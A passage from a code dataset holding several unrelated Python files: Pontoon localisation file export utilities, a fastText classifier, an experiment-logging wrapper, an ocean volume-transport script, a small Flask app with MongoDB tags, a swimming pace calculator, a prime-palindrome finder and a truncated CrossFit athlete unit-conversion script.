f.write(u.read().decode(\"utf-8-sig\").encode(\"utf-8\"))\n except IOError as e:\n log.debug(\"IOError: \" + str(e))\n\n # Detect format\n temp, file_extension = os.path.splitext(file_name)\n format = file_extension[1:].lower()\n format = 'po' if format == 'pot' else format\n\n # Save files to server\n else:\n\n if not locales:\n update_from_vcs(repository_type, repository_url, repository_path)\n\n if repository_url_master: # One-locale repo\n if not locales:\n locales = project.locales.all()\n for l in locales:\n update_from_vcs(\n repository_type,\n os.path.join(repository_url_master, l.code),\n os.path.join(repository_path_master, l.code))\n\n elif locales:\n if repository_type == 'svn':\n for l in locales:\n path = get_locale_directory(project, l)[\"path\"]\n update_from_vcs(repository_type, None, path)\n\n else:\n update_from_vcs(\n repository_type, repository_url, repository_path)\n\n # Detect format\n source_directory = get_source_directory(repository_path_master)\n format = detect_format(source_directory['path'])\n\n # Store project format and repository_path\n project.format = format\n project.repository_path = repository_path\n project.save()\n\n\ndef dump_po(project, locale):\n \"\"\"Update .po (gettext) files from database.\"\"\"\n\n locale_paths = get_locale_paths(project, locale)\n\n for path in locale_paths:\n po = polib.pofile(path)\n date = datetime.datetime(1, 1, 1)\n newest = Translation()\n relative_path = get_relative_path(path, locale)\n resource = Resource.objects.filter(project=project, path=relative_path)\n entities = Entity.objects.filter(resource=resource, obsolete=False)\n\n for entity in entities:\n entry = po.find(polib.unescape(smart_text(entity.string)))\n if entry:\n if not entry.msgid_plural:\n translation = get_translation(entity=entity, locale=locale)\n if translation.string != '':\n entry.msgstr = polib.unescape(translation.string)\n if translation.date > date:\n date = 
translation.date\n newest = translation\n if ('fuzzy' in entry.flags and not translation.fuzzy):\n entry.flags.remove('fuzzy')\n\n else:\n for i in range(0, 6):\n if i < (locale.nplurals or 1):\n translation = get_translation(\n entity=entity, locale=locale, plural_form=i)\n if translation.string != '':\n entry.msgstr_plural[unicode(i)] = \\\n polib.unescape(translation.string)\n if translation.date > date:\n date = translation.date\n newest = translation\n if ('fuzzy' in entry.flags and\n not translation.fuzzy):\n entry.flags.remove('fuzzy')\n # Remove obsolete plural forms if exist\n else:\n if unicode(i) in entry.msgstr_plural:\n del entry.msgstr_plural[unicode(i)]\n\n # Update PO metadata\n if newest.id:\n po.metadata['PO-Revision-Date'] = newest.date\n if newest.user:\n po.metadata['Last-Translator'] = '%s <%s>' \\\n % (newest.user.first_name, newest.user.email)\n po.metadata['Language'] = locale.code\n po.metadata['X-Generator'] = 'Pontoon'\n\n if locale.nplurals:\n po.metadata['Plural-Forms'] = 'nplurals=%s; plural=%s;' \\\n % (str(locale.nplurals), locale.plural_rule)\n\n po.save()\n log.debug(\"File updated: \" + path)\n\n\ndef dump_properties(project, locale):\n \"\"\"Update .properties files from database. Generate files from source\n files, but only ones with translated strings.\"\"\"\n\n resources = Resource.objects.filter(project=project)\n entities = Entity.objects.filter(resource__in=resources, obsolete=False)\n locale_directory_path = get_locale_directory(project, locale)[\"path\"]\n\n # Remove all non-hidden files and folders in locale repository\n items = os.listdir(locale_directory_path)\n items = [i for i in items if not i[0] == '.']\n for item in items:\n path = os.path.join(locale_directory_path, item)\n try:\n shutil.rmtree(path)\n except OSError:\n os.remove(path)\n except Exception as e:\n log.error(e)\n\n parser = silme.format.properties.PropertiesFormatParser\n source_directory = get_source_directory(project.repository_path)\n\n # Get relative paths to translated files only\n translations = Translation.objects.filter(\n entity__in=entities, locale=locale)\n\n entities_pks = translations.values(\"entity\").distinct()\n entities_translated = Entity.objects.filter(pk__in=entities_pks)\n resources_pks = entities_translated.values(\"resource\").distinct()\n resources_translated = Resource.objects.filter(pk__in=resources_pks)\n\n relative_paths = resources_translated.values_list(\"path\").distinct()\n\n for relative in relative_paths:\n path = os.path.join(locale_directory_path, relative[0])\n\n # Create folders and copy files from source\n basedir = os.path.dirname(path)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n try:\n shutil.copy(\n os.path.join(source_directory['path'], relative[0]), path)\n # Obsolete files\n except Exception as e:\n log.debug(e)\n continue\n\n with codecs.open(path, 'r+', 'utf-8') as f:\n structure = parser.get_structure(f.read())\n resource = resources.filter(path=relative[0])\n entities_with_path = entities.filter(resource=resource)\n\n for entity in entities_with_path:\n key = entity.key\n translation = get_translation(entity=entity, locale=locale)\n\n try:\n if (translation.string != '' or\n translation.pk is not None):\n # Modify translated entities\n structure.modify_entity(key, translation.string)\n else:\n # Remove untranslated and following newline\n pos = structure.entity_pos(key)\n structure.remove_entity(key)\n line = structure[pos]\n\n if type(line) == unicode and line.startswith('\\n'):\n line = line[len('\\n'):]\n 
structure[pos] = line\n                    if len(line) == 0:\n                        structure.remove_element(pos)\n\n                # Obsolete entities\n                except KeyError as e:\n                    pass\n\n            # Erase file and then write, otherwise content gets appended\n            f.seek(0)\n            f.truncate()\n            content = parser.dump_structure(structure)\n            f.write(content)\n\n        log.debug(\"File updated: \" + path)\n\n\ndef dump_lang(project, locale):\n    \"\"\"Update .lang files from database.\"\"\"\n\n    locale_paths = get_locale_paths(project, locale)\n\n    for path in locale_paths:\n        relative_path = get_relative_path(path, locale)\n\n        try:\n            resource = Resource.objects.get(\n                project=project, path=relative_path)\n        except Resource.DoesNotExist as e:\n            log.error('Resource does not exist')\n            continue\n\n        with codecs.open(path, 'r+', 'utf-8', errors='replace') as lines:\n            content = []\n            translation = None\n\n            for line in lines:\n                if translation:\n                    # Keep newlines and white spaces in line if present\n                    trans_line = line.replace(line.strip(), translation)\n                    content.append(trans_line)\n                    translation = None\n                    continue\n\n                content.append(line)\n                line = line.strip()\n\n                if not line:\n                    continue\n\n                if line[0] == ';':\n                    original = line[1:].strip()\n\n                    try:\n                        entity = Entity.objects.get(\n                            resource=resource, string=original)\n                    except Entity.DoesNotExist as e:\n                        log.error('%s: Entity \"%s\" does not exist %s' %\n                                  (path, original, project.name))\n                        continue\n\n                    translation = get_translation(\n                        entity=entity, locale=locale).string\n                    if translation == '':\n                        translation = original\n                    elif translation == original:\n                        translation += ' {ok}'\n\n            # Erase file and then write, otherwise content gets appended\n            lines.seek(0)\n            lines.truncate()\n            lines.writelines(content)\n        log.debug(\"File updated: \" + path)\n\n\ndef dump_ini(project, locale):\n    \"\"\"Update .ini files from database.\"\"\"\n\n    path = get_locale_directory(project, locale)[\"path\"]\n    source_path = get_source_paths(path)[0]\n    resource = Resource.objects.get(project=project, path=source_path)\n    entities = Entity.objects.filter(resource=resource, obsolete=False)\n    config = configparser.ConfigParser()\n\n    with codecs.open(source_path, 'r+', 'utf-8', errors='replace') as f:\n        try:\n            config.read_file(f)\n            if config.has_section(locale.code):\n\n                for entity in entities:\n                    key = entity.key\n                    translation = get_translation(\n                        entity=entity, locale=locale).string\n\n                    config.set(locale.code, key, translation)\n\n                # Erase and then write, otherwise content gets appended\n                f.seek(0)\n                f.truncate()\n                config.write(f)\n                log.debug(\"File updated: \" + source_path)\n\n            else:\n                log.debug(\"Locale not available in the source file\")\n                raise Exception(\"error\")\n\n        except Exception as e:\n            log.debug(\"INI configparser: \" + str(e))\n\n\ndef dump_from_database(project, locale):\n    \"\"\"Update project files from database.\"\"\"\n    log.debug(\"Update project files from database.\")\n\n    path = get_locale_directory(project, locale)[\"path\"]\n    if not path:\n        return False\n\n    globals()['dump_%s' % project.format](project, locale)\n    return path\n\n\ndef generate_zip(project, locale):\n    \"\"\"\n    Generate .zip of all project files for the specified locale.\n\n    Args:\n        project: Project instance\n        locale: Locale code\n    Returns:\n        A string for generated ZIP content.\n    \"\"\"\n    log.debug(\"Generate .zip of all project files for the specified locale.\")\n\n    try:\n        locale = Locale.objects.get(code=locale)\n    except Locale.DoesNotExist as e:\n        log.error(e)\n\n    path = dump_from_database(project, locale)\n    if not path:\n        return False\n\n    s = StringIO.StringIO()\n    zf = zipfile.ZipFile(s, "w")\n\n    # ZIP empty root directory to avoid corrupt archive if no file translated\n    root = os.path.split(path)[-1]\n    zf.write(path, root)\n\n    for root, dirs, filenames in os.walk(path):\n        for f in filenames:\n            file_path = os.path.join(root, f)\n            zip_path = os.path.relpath(file_path, os.path.join(path, '..'))\n            zf.write(file_path, zip_path)\n\n    zf.close()\n    return s.getvalue()\n","sub_path":"pontoon/administration/utils/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":32984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"117911721","text":"import numpy as np\r\nimport os,re\r\nfrom fasttext import train_supervised,load_model\r\n\r\n\r\nclass fasttext_classfication(object):\r\n    def __init__(self):\r\n        pass\r\n\r\n    def train_model(self, trainFilePath=None, dim=100, epoch=5, lr=0.1, loss='softmax',minCount=1):\r\n        np.set_printoptions(suppress=True)\r\n        model = f'./model/fastText_dataDim{str(dim)}_lr{str(lr)}_iter{str(epoch)}.model'\r\n\r\n        if os.path.isfile(model):\r\n            classifier = load_model(model)\r\n        else:\r\n            classifier = train_supervised(input=trainFilePath, label='__label__', dim=dim, epoch=epoch,\r\n                                          lr=lr, wordNgrams=2, loss=loss,minCount=minCount)\r\n        \"\"\"\r\n        Train a supervised model and return a model object.\r\n        \r\n        @param input: path to the training data file\r\n        @param lr: learning rate\r\n        @param dim: size of the word vectors\r\n        @param ws: window size, used by the cbow model\r\n        @param epoch: number of epochs\r\n        @param minCount: word-frequency threshold; rarer words are filtered out at init\r\n        @param minCountLabel: label-frequency threshold; rarer labels are filtered out at init\r\n        @param minn: min number of chars when building subwords\r\n        @param maxn: max number of chars when building subwords\r\n        @param neg: number of negatives sampled\r\n        @param wordNgrams: length of word n-grams\r\n        @param loss: loss function: softmax, ns (negative sampling) or hs (hierarchical softmax)\r\n        @param bucket: bucket size for word expansion, [A, B]: A holds vectors for in-corpus words, B for out-of-corpus words\r\n        @param thread: number of threads; each thread processes one slice of the input, thread 0 reports the loss\r\n        @param lrUpdateRate: rate of updates for the learning rate\r\n        @param t: sampling threshold\r\n        @param label: label prefix\r\n        @param verbose: ??\r\n        @param pretrainedVectors: path to pre-trained word vectors; words found there are not initialized randomly\r\n        @return model object\r\n        \"\"\"\r\n        classifier.save_model(model)\r\n        return classifier\r\n\r\n\r\n    def cal_precision_and_recall(self,model_path='',testFilePath=''):\r\n        if os.path.isfile(model_path):\r\n            model = load_model(model_path)\r\n            result = model.test(path=testFilePath)\r\n            precision = result[1]\r\n            recall = result[2]\r\n            F1 = (2 * precision * recall) / (precision + recall)\r\n\r\n            print('number of test samples ', result[0])\r\n            print('precision: {:.4f}'.format(precision))\r\n            print('recall: {:.4f}'.format(recall))\r\n            print('F1-precision: {:.4f}'.format(F1))\r\n            return precision, recall, F1\r\n        else:\r\n            print('You provided an invalid model path......')\r\n\r\n    def predict(self,model_path='',input=\"Why not put knives in the dishwasher?\",k=2):\r\n\r\n        input_ = ' '.join(re.findall(pattern=r\"([a-zA-Z0-9\\u4E00-\\u9FA5]+)\",string=input))\r\n\r\n        if os.path.isfile(model_path):\r\n            model = load_model(model_path)\r\n            result = model.predict(input_, k)\r\n            print(result)\r\n            return result\r\n\r\nif __name__ == '__main__':\r\n\r\n    flag=2\r\n    fs = fasttext_classfication()\r\n    if flag==0:\r\n        # train and save the model\r\n        train_path = f'./data/fasttext_cook/cooking.train'\r\n        fs.train_model(trainFilePath=train_path,epoch=200)\r\n    elif flag==1:\r\n        # compute model precision, recall, F1\r\n        _, _, _ = fs.cal_precision_and_recall(model_path='./model/fastText_dataDim100_lr0.1_iter200.model',\r\n                                              testFilePath='./data/fasttext_cook/cooking.valid')\r\n    elif flag == 2:\r\n        # model prediction\r\n        _ = fs.predict(model_path='./model/fastText_dataDim100_lr0.1_iter200.model',\r\n                       input=\"Why not put knives in the 
dishwasher?\")\r\n\r\n\r\n\r\n","sub_path":"fasttext_classfication.py","file_name":"fasttext_classfication.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54162599","text":"import logging\nfrom typing import Any, Tuple, Dict\nfrom dataclasses import dataclass\nfrom .timer import Timer\n\n_logger = logging.getLogger(__name__)\n\n\n# TODO:\n# no rerun when already existing\n# colorlog\n# product state\n# persistent storage\n# convert experiment_store to pandas DataFrame (args as own field)\n\n\n@dataclass\nclass FuncCall:\n func: Any\n args: Tuple[Any]\n kwargs: Dict[str, Any]\n\n\nclass FuncCallOutcome:\n pass\n\n\n@dataclass\nclass FuncCallResult(FuncCallOutcome):\n func_call: FuncCall\n result: Any\n duration: float\n\n\n@dataclass\nclass FuncCallException(FuncCallOutcome):\n func_call: FuncCall\n exception: Any\n duration: float\n\n\nclass Experiments:\n def __init__(self, experiment_store=None, failed_experiment_store=None):\n self.experiment_store = experiment_store or []\n self.failed_experiment_store = failed_experiment_store or []\n\n self.last_logged_func_call_result = None\n\n def __call__(self, func, *args, **kwargs):\n func_call = FuncCall(func=func, args=args, kwargs=kwargs)\n\n cur_func_call_result = self._func_call_result(func_call)\n\n self._store_result(cur_func_call_result)\n self._log(cur_func_call_result)\n\n return cur_func_call_result\n\n @staticmethod\n def _func_call_result(func_call) -> FuncCallOutcome:\n timer = Timer()\n\n try:\n func_result = func_call.func(*func_call.args, **func_call.kwargs)\n exception = None\n except Exception as exc:\n func_result = None\n exception = exc\n\n duration = timer.duration()\n\n if exception is None:\n return FuncCallResult(\n func_call=func_call, result=func_result, duration=duration\n )\n else:\n return FuncCallException(\n func_call=func_call, exception=exception, duration=duration\n )\n\n def _store_result(self, func_call_result):\n if isinstance(func_call_result, FuncCallResult):\n self.experiment_store.append(func_call_result)\n else:\n self.failed_experiment_store.append(func_call_result)\n\n def _log(self, func_call_result):\n func_name = func_call_result.func_call.func.__name__\n args_text = \", \".join(map(str, func_call_result.func_call.args))\n kwargs_text = \", \".join(\n f\"{key}={val}\" for key, val in func_call_result.func_call.kwargs.items()\n )\n func_call_text = (\n f\"{func_name}({', '.join(filter(None, [args_text, kwargs_text]))})\"\n )\n\n duration_text = str(func_call_result.duration)\n\n if isinstance(func_call_result, FuncCallResult):\n result = func_call_result.result\n _logger.info(f\"{func_call_text} --> {result} (in {duration_text})\")\n else:\n exception = func_call_result.exception\n _logger.error(\n f\"{func_call_text} failed with {exception} (in {duration_text})\"\n )\n\n\n","sub_path":"dstk/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427405539","text":"import os\nimport pickle\nimport numpy as np\nimport netCDF4 as nc\nfrom itertools import compress\nimport datetime as dt\nfrom joblib import Parallel\nimport xarray as xr\n\n#-------------------------------------------------------------\n\nyears=[2015]\nresults_folder = 'Stephan-2022-transport/'\n\n# coordinates of boundaries for which to calculate fluxes:----\nNSi = np.arange(1580,1630); NSj = 630; # 
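How the Experiments wrapper above is meant to be called: the instance itself is invoked with a function plus its arguments, and failures are captured rather than raised. The stand-in Timer and helper below replace the package-relative dstk imports so the sketch runs standalone; they are not the package's real API:

```python
import time

class Timer:  # stand-in for dstk's .timer.Timer
    def __init__(self):
        self._start = time.perf_counter()
    def duration(self):
        return time.perf_counter() - self._start

def call_and_capture(func, *args, **kwargs):
    # Same shape as Experiments.__call__: never raises, always times.
    timer = Timer()
    try:
        return ('ok', func(*args, **kwargs), timer.duration())
    except Exception as exc:
        return ('error', exc, timer.duration())

print(call_and_capture(lambda a, b: a / b, 6, 2))  # ('ok', 3.0, ...)
print(call_and_capture(lambda a, b: a / b, 1, 0))  # ('error', ZeroDivisionError(...), ...)
```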
Nares Strait\nLSi = 1584; LSj = np.arange(496,534); # Lancaster Sound\nJSi = 1609; JSj = np.arange(554,583); # Jones Sound\n\n#-------------------------------------------------------------\n# Load files:\nmask = nc.Dataset('/ocean/brogalla/GEOTRACES/data/ANHA12/ANHA12_mask.nc') \numask = np.array(mask.variables['umask'])[0,:,:,:]\nvmask = np.array(mask.variables['vmask'])[0,:,:,:]\n\nmesh = nc.Dataset('/ocean/brogalla/GEOTRACES/data/ANHA12/ANHA12_mesh1.nc')\ne1v_base = np.array(mesh.variables['e1v'])[0,:,:]\ne2u_base = np.array(mesh.variables['e2u'])[0,:,:]\ne3t = np.array(mesh.variables['e3t_0'])[0,:,:,:]\ne3v = np.array(mesh.variables['e3v_0'])[0,:,:,:]\ne3u = np.array(mesh.variables['e3u_0'])[0,:,:,:]\ndepth = np.array(mesh.variables['nav_lev'])\n\ne1v = np.empty_like(e3t[:,:,:]); e1v[:] = e1v_base\ne2u = np.empty_like(e3t[:,:,:]); e2u[:] = e2u_base\n\n#-------------------------------------------------------------\ndef files_time_series(year, start_date, end_date):\n #start_date and end_date are datetime objects\n \n # Create list of filenames that fall within the start and end date time range:\n dyn_file_list = np.sort(os.listdir('/data/brogalla/ANHA12/'))\n \n Vlist = [i[26:31]=='gridV' for i in dyn_file_list]\n Ulist = [i[26:31]=='gridU' for i in dyn_file_list]\n \n gridV_list = list(compress(dyn_file_list, Vlist))\n gridU_list = list(compress(dyn_file_list, Ulist))\n \n dateV_list = [dt.datetime.strptime(i[14:25], \"y%Ym%md%d\") for i in gridV_list]\n dateU_list = [dt.datetime.strptime(i[14:25], \"y%Ym%md%d\") for i in gridU_list]\n \n gridV_file_list = list(compress(gridV_list, [V > start_date and V < end_date for V in dateV_list]))\n gridU_file_list = list(compress(gridU_list, [U > start_date and U < end_date for U in dateU_list]))\n \n return gridV_file_list, gridU_file_list\n\ndef main_calc(year, filenameU, filenameV): \n \n # Load 5-day velocity file\n dyn_folder = '/data/brogalla/ANHA12/'\n file_u = nc.Dataset(dyn_folder + filenameU)\n file_v = nc.Dataset(dyn_folder + filenameV)\n u_vel = np.array(file_u.variables['vozocrtx'])[0,:,:,:] \n v_vel = np.array(file_v.variables['vomecrty'])[0,:,:,:] \n \n # For each of the boundaries, call function to calculate the flux:\n flx_LS = calc_flux(LSi, LSj, u_vel, v_vel)\n flx_NS = calc_flux(NSi, NSj, u_vel, v_vel)\n flx_JS = calc_flux(JSi, JSj, u_vel, v_vel)\n \n return flx_LS, flx_NS, flx_JS\n\ndef calc_flux(i, j, u_vel, v_vel): \n i = np.array(i)\n j = np.array(j)\n\n # horizontal boundary\n if i.size > j.size: \n bdy_vel = u_vel[:, i[0]:i[-1], j]\n area = e2u[:, i[0]:i[-1], j] * e3u[:,i[0]:i[-1],j]\n cond_mask = (umask[:,i[0]:i[-1],j] < 0.1)\n \n # vertical boundary\n else: \n bdy_vel = v_vel[:, i , j[0]:j[-1]]\n area = e1v[:, i , j[0]:j[-1]] * e3v[:,i,j[0]:j[-1]]\n cond_mask = (vmask[:,i,j[0]:j[-1]] < 0.1)\n \n # Point-wise multiplication with areas of each of the grid boxes:\n flx_V = np.multiply(bdy_vel, area)\n \n # Mask the depth levels that correspond to points on land:\n flx_mask_V = np.ma.masked_where(cond_mask, flx_V)\n \n return flx_mask_V\n\n#-------------------------------------------------------------\n\nfor year in years:\n # Create list of five-day files:\n print(year)\n start_date = dt.datetime(year,1,1)\n end_date = dt.datetime(year,12,31)\n gridV_files, gridU_files = files_time_series(year, start_date, end_date)\n print(len(gridV_files), len(gridU_files))\n \n # call the function for each file that is within range of start date, end date\n a = len(gridV_files)\n time_series_LS = np.empty((a, 50, LSj.size-1)); \n 
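The area-weighted, land-masked flux idea behind calc_flux, reduced to toy arrays (the numbers are illustrative, not model output):

```python
import numpy as np

vel = np.array([[0.1, 0.2], [0.3, 0.4]])     # velocity normal to the section (m/s)
area = np.array([[1e6, 1e6], [2e6, 2e6]])    # cell face areas (m^2)
land = np.array([[False, True], [False, False]])

flux = np.ma.masked_where(land, vel * area)  # m^3/s per cell, land cells masked
print(flux.sum())                            # total transport over wet cells: 1.5e6
```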
time_series_NS = np.empty((a, 50, NSi.size-1)); \n    time_series_JS = np.empty((a, 50, JSj.size-1)); \n    \n    for f, V_file in enumerate(gridV_files):\n        print(f)\n        time_LS, time_NS, time_JS = main_calc(year, gridU_files[f], V_file)\n        time_series_LS[f,:,:] = time_LS\n        time_series_NS[f,:,:] = time_NS\n        time_series_JS[f,:,:] = time_JS\n    \n    #Save time series to files:\n    file_write = xr.Dataset(\n        {'transport_LS': (("t","z","yLS"), time_series_LS),\n        'transport_NS': (("t","z","xNS"), time_series_NS),\n        'transport_JS': (("t","z","yJS"), time_series_JS)},\n        coords = {\n            "t": np.zeros(a),\n            "z": depth, \n            "yLS": np.zeros(LSj.size-1),\n            "xNS": np.zeros(NSi.size-1),\n            "yJS": np.zeros(JSj.size-1)\n        },\n        attrs = {\n            'long_name':'Volume transport time series',\n            'units':'m3/s',\n        }\n    )\n    file_write.to_netcdf(f'{results_folder}time-series-{year}.nc')\n","sub_path":"Stephan/volume-time-series.py","file_name":"volume-time-series.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"565133683","text":"from flask import Flask, render_template, abort\nimport json\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root@localhost/app'\ndb = SQLAlchemy(app)\n\nclient = MongoClient('127.0.0.1',27017)\nmdb = client.app1\n\nclass File(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    title = db.Column(db.String(80))\n    created_time = db.Column(db.DateTime)\n    content = db.Column(db.Text)\n    category_id = db.Column(db.Integer,db.ForeignKey('category.id'))\n    category = db.relationship('Category', backref=db.backref('files', lazy='dynamic'))\n    #tags = []\n\n    def __init__(self, title, category, content):\n        self.title = title\n        self.created_time = datetime.utcnow()\n        self.category = category\n        self.content = content\n        #self.tags = []\n\n    def __repr__(self):\n        return '<File %r>' % self.title\n\n    def add_tag(self, tag_name):\n        mfile = mdb.mfile.find_one({'title':self.title})\n        #print(mfile)\n        if not mfile:\n            tags = self.tags\n            tags.append(tag_name)\n            mfile = {'title':self.title,'tags':tags}\n            mdb.mfile.insert_one(mfile)\n        elif not mfile['tags']:\n            tags = self.tags\n            tags.append(tag_name)\n            mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n        else:\n            tags = mfile['tags']\n            if tag_name in mfile['tags']:\n                pass\n            else:\n                tags.append(tag_name)\n                mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n\n    def remove_tag(self, tag_name):\n        mfile = mdb.mfile.find_one({'title':self.title})\n        if tag_name in mfile['tags']:\n            tags = mfile['tags']\n            print(tags)\n            #tags_new = tags.remove(tag_name)\n            tags.remove(tag_name)\n            print(tags)\n            mdb.mfile.update_one({'title':self.title},{'$set':{'tags':tags}})\n        else:\n            pass\n\n    @property\n    def tags(self):\n        mfile = mdb.mfile.find_one({'title':self.title})\n        if not mfile:\n            tags = []\n            return tags\n        elif not mfile['tags']:\n            tags =[]\n            return tags\n        else:\n            tags = mfile['tags']\n            return tags\n\nclass Category(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(80))\n\n    def __init__(self, name):\n        self.name = name\n\n    def __repr__(self):\n        return '<Category %r>' % self.name\n\n@app.route('/')\ndef index():\n    target_dir = '/home/shiyanlou/files/'\n    articles = File.query.all()\n    return render_template('index.html',articles=articles)\n\n\n@app.route('/files/<file_id>')\ndef file(file_id):\n    article = 
File.query.filter_by(id=file_id).first()\n if not article:\n abort(404)\n else:\n return render_template('file.html',article=article)\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html'), 404\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"week24/news/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407272537","text":"# NataCalc\n# GAE application for calculating mean pace swimming times.\n\nimport os\n\nimport jinja2\nimport webapp2\n\nfrom libdeporcalc import Calculator\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader( os.path.dirname( __file__ ) ),\n extensions=[ \"jinja2.ext.autoescape\" ],\n autoescape=True )\n\ndef parseFloat(s):\n\ttoret = 0.0;\n\n\ts = s.replace( ',', '.' );\n\ttry:\n\t\ttoret = float( s );\n\texcept:\n\t\ttoret = 0.0\n\n\treturn toret;\n\ndef parseInt(s):\n\ttoret = 0;\n\n\ttry:\n\t\ttoret = int( s );\n\texcept:\n\t\ttoret = 0\n\n\treturn toret;\n\nclass ResultsPage(webapp2.RequestHandler):\n\tAnswerPageFile = \"answer.html\";\n\n\tdef __init__(self, request=None, response=None):\n\t\tself.initialize( request, response )\n\n\t\tself.hours = parseInt( self.request.get( \"h\", \"0\" ) );\n\t\tself.minutes = parseInt( self.request.get( \"m\", \"1\" ) );\n\t\tself.seconds = parseInt( self.request.get( \"s\", \"30\" ) );\n\t\tself.distance = parseFloat( self.request.get( \"d\", \"0.1\" ) );\n\n\tdef post(self):\n\t\tcalc = Calculator( self.distance, self.hours, self.minutes, self.seconds );\n\t\tcalc.calculate();\n\n\t\ttemplate_values = {\n\t\t\t'd': self.distance,\n\t\t\t'h': str.format( \"{0:02}\", self.hours ),\n\t\t\t'm': str.format( \"{0:02}\", self.minutes ),\n\t\t\t's': str.format( \"{0:02}\", self.seconds ),\n\t\t\t'kmsh': str.format( \"{0:5}\", calc.getKmsPerHour() ),\n\t\t\t't100m': Calculator.formatTime( calc.getTimePer100m() ),\n\t\t\t'tkm': Calculator.formatTime( calc.getTimePer1000m() ),\n }\n\n\t\ttemplate = JINJA_ENVIRONMENT.get_template( ResultsPage.AnswerPageFile )\n\t\tself.response.write( template.render( template_values ) );\n\napp = webapp2.WSGIApplication([\n ('/calc', ResultsPage),\n], debug=True)\n","sub_path":"deporcalc.py","file_name":"deporcalc.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448968854","text":"def is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n\ndef is_prime(n):\n if n == 2 or n == 3:\n return True\n if n < 2 or n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n r = int(n ** 0.5)\n f = 5\n while f <= r:\n if not n % f:\n return False\n if not n % (f+2):\n return False\n f += 6\n return True\n\n\nif __name__ == '__main__':\n max_count = 1000\n for x in range(max_count, 2, -1):\n if is_palindrome(x) and is_prime(x):\n print(x)\n break\n","sub_path":"easy/003-prime-palindrome/prime_palindrome.py","file_name":"prime_palindrome.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156442425","text":"from bs4 import BeautifulSoup\nimport sys\nimport subprocess\n\n\nFilenameAthletes=sys.argv[1]\nFilenameOutput=sys.argv[2]\n\n#print(\"Filename = \" + Filename)\n\nAthleteText = open(FilenameAthletes, 'r').read().encode('ascii', 'ignore')\n\nathleteTraverse=0\n#athleteTraverse=1850000\n\nprint(\"Total 
Length: \" + str(len(AthleteText)))\n\nwhile (athleteTraverse<len(AthleteText)):\n    nextComma=AthleteText.find(',',athleteTraverse)\n    currentString=AthleteText[athleteTraverse:nextComma+1]\n\n    if (currentString.find('ossFit 27:17')>0):\n        currentString=\"crossfit 27-17,\"\n        athleteTraverse=athleteTraverse+14\n\n    if (currentString.find('ossFit 4:13')>0):\n        currentString=\"crossfit 4-13,\"\n        athleteTraverse=athleteTraverse+14\n\n    if (currentString.find('ville: The Anvil')>0):\n        currentString=\"Crossfit Summerville- The Anvil,\"\n        athleteTraverse=athleteTraverse+25\n\n    # find lb and convert to kg\n    if (currentString.find(' lb,')>-1):\n        locationOfUnit=currentString.find('lb')\n        remainString=currentString[:locationOfUnit]\n        \n        intValue=int(remainString)\n        newValue=int(round(intValue/2.2))\n\n        #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n        \n        AthleteText=AthleteText[:athleteTraverse]+str(newValue)+\",\"+AthleteText[nextComma:]\n\n    # find and remove \" cm\"\n    if (currentString.find(' cm,')>-1):\n        #print(\"REMOVED CM\" + str(currentString))\n        locationOfUnit=currentString.find(' cm')\n        remainString=currentString[:locationOfUnit]\n        \n        #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n        AthleteText=AthleteText[:athleteTraverse]+remainString+AthleteText[nextComma-1:]\n\n    # find and remove \" kg\"\n    if (currentString.find(' kg,')>-1):\n        #print(\"REMOVED KG\" + str(currentString))\n        locationOfUnit=currentString.find(' kg')\n        remainString=currentString[:locationOfUnit]\n        \n        #print(str(athleteTraverse)+\" \"+ str(newValue))\n\n        AthleteText=AthleteText[:athleteTraverse]+remainString+AthleteText[nextComma-1:]\n\n    # find inches and convert to cm\n    if ((currentString.find('\\'')>-1) and (currentString.find('\\\"')>-1)):\n        locationOfSingleQuote=currentString.find('\\'')\n        remainString=currentString[:locationOfSingleQuote]\n        \n        intValue=int(remainString)\n        feetValue=int(round(intValue*12))\n\n        locationOfDoubleQuote=currentString.find('\\\"')\n        remainString=currentString[locationOfSingleQuote+1:locationOfDoubleQuote]\n        \n        intValue=int(remainString)\n        inchesValue=int(intValue)\n\n        totalInches=feetValue+inchesValue\n\n        #print(\"Total Inches: \" + str(totalInches))\n\n        AthleteText=AthleteText[:athleteTraverse]+str(int(round(totalInches*2.54)))+\",\"+AthleteText[nextComma:]\n\n    # find minutes and convert to seconds\n    if ((currentString.find(':')>-1) and (currentString.find('oss')<0)):\n\n        locationOfColon=currentString.find(':')\n        remainString=currentString[:locationOfColon]\n        \n        intValue=int(remainString)\n        minuteValue=int(round(intValue*60))\n\n        secondsValue=int(currentString[(currentString.find(':')+1):len(currentString)-1])\n\n        totalSeconds=minuteValue+secondsValue\n\n        #print(\"Total Seconds: \" + str(totalSeconds))\n\n        